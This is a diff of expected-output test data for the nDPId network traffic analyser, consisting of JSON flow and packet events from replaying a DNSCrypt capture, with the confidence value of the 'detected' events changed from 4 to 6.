+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":151,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305327} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":151,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAABQwJEAub0RdhsKAAABlXBwCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305328,"flow_last_seen":946739305328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":946739305328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305328,"pkt":"REREREREZmZmZmZmCABFAAIcwJJAAL0RNQcKAAABlXBwCti6IPsCCMhQa\/wBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305328,"flow_last_seen":946739305328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305328,"flow_last_seen":946739305328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":946739305329,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739305329,"pkt":"ZmZmZmZmRERERERECABFAADWg1EAADQR55WOBMxvCgAAAQG7qfEAwi9XAg+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":946739305330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739305330,"pkt":"ZmZmZmZmRERERERECABFAADWg08AADQR55eOBMxvCgAAAQG77iIAwusoAgyBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} 
00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":946739305331,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739305331,"pkt":"ZmZmZmZmRERERERECABFAADWg1IAADQR55SOBMxvCgAAAQG7twgAwiI\/AhCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"} 
@@ -341,26 +341,26 @@ 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":946739305384,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":946739305384,"pkt":"ZmZmZmZmRERERERECABFAABH12NAADsRoguVcHAKCgAAASD74HkAM076a\/6AAAABAAAAAAAAATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQ=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739306241,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":49512,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAXc+mAgAL0REzsKAAABrGhdUMbhBaMGBCsUtDYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":179,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739306241} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":179,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAABQ+mAAub0ROA4KAAABrGhdUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAXc+mEgAL0REzoKAAABrGhdUKNIBaMGBE6vtDQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":181,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739306241} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":181,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAABQ+mEAub0ROA0KAAABrGhdUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739306241,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
